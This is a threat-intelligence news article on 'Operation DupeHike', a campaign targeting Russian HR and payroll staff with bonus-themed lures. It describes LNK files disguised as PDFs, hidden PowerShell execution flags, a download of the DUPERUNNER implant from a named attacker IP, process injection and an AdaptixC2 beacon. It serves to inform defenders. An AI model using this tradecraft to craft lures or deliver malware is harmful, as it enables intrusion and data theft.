A sophisticated cyberattack campaign named Operation DupeHike is actively targeting Russian corporations, with a particular focus on employees in human resources, payroll, and administrative departments. The threat group UNG0902 is reportedly behind this operation, employing highly crafted decoy documents related to employee bonuses and internal financial policies to deploy a novel malware ecosystem onto victim systems.
The campaign was identified by Seqrite security analysts after a malicious ZIP archive was discovered on VirusTotal on November 21, 2025. The attackers demonstrate a nuanced understanding of Russian corporate HR practices, creating convincing social engineering lures. These lures mimic realistic bonus structures, referencing Russia’s Labor Code and detailing bonus rates, such as fifteen percent of the annual salary, to effectively target personnel in financial roles.
Infection Mechanism and Technical Breakdown of Operation DupeHike
The attack chain involves a three-stage process initiated by the execution of malicious LNK (shortcut) files. Spear-phishing emails deliver ZIP archives, often named “Премия 2025.zip” (Bonus.Zip), containing these LNK files. The shortcut files are disguised as PDF documents, using filenames like “Document_1_On_the_size_of_the_annual_bonus.pdf.lnk,” to trick recipients into opening them.
Upon execution of the LNK file, PowerShell is launched in a hidden mode using specific flags: NoNI, nop, and w. This hidden execution is designed to evade immediate user detection. The script then utilizes Invoke-WebRequest to download the second-stage implant, known as DUPERUNNER, from an attacker-controlled server located at 46.149.71.230.
DUPERUNNER, a C++ compiled implant, is responsible for critical reconnaissance and system injection tasks. According to Seqrite’s analysis, this malware is equipped with multiple functions aimed at establishing persistence on the compromised system and evading security measures. It actively scans for target processes such as explorer.exe, notepad.exe, and msedge.exe, identifying suitable targets for injection.
Concurrently, DUPERUNNER downloads decoy PDF documents to display to the user. This action creates a facade of legitimate document processing, further masking the malicious activity occurring in the background. This dual approach of deception and stealth is a hallmark of advanced persistent threats.
The final stage involves remote thread injection, where the DUPERUNNER implant loads the ultimate payload: an AdaptixC2 beacon. This command-and-control (C2) beacon communicates with the attackers’ infrastructure using HTTP POST requests. This communication channel grants the attackers the ability to execute remote commands and exfiltrate sensitive data from the compromised network.
To further enhance its evasion capabilities, the AdaptixC2 beacon employs dynamic API resolution. This technique, utilizing djb2-style hashing, helps the malware avoid detection based on static signatures, making it more resilient against traditional security solutions. The sophistication of this mechanism highlights the evolving tactics of the UNG0902 threat group.
Configuration artifacts extracted by Seqrite researchers revealed key indicators of compromise, including beacon identification numbers and C2 infrastructure details. This infrastructure is hosted on servers under ASN 48282 and AS 9123, managed by VDSINA-AS and TIMEWEB-AS, respectively. The attackers have demonstrated adaptability by changing port configurations, initially using port 80 for implant delivery and later switching to port 443 for final beacon operations, suggesting continuous refinement of their attack infrastructure.
This ongoing campaign signifies a disturbing trend in the cyber threat landscape, where highly sophisticated social engineering tactics are being combined with advanced malware capabilities. The targeting of critical administrative functions within Russian corporations poses a significant risk to business continuity and data security. Organizations are advised to remain vigilant and enhance their cybersecurity defenses to mitigate the impact of such evolving threats as Operation DupeHike.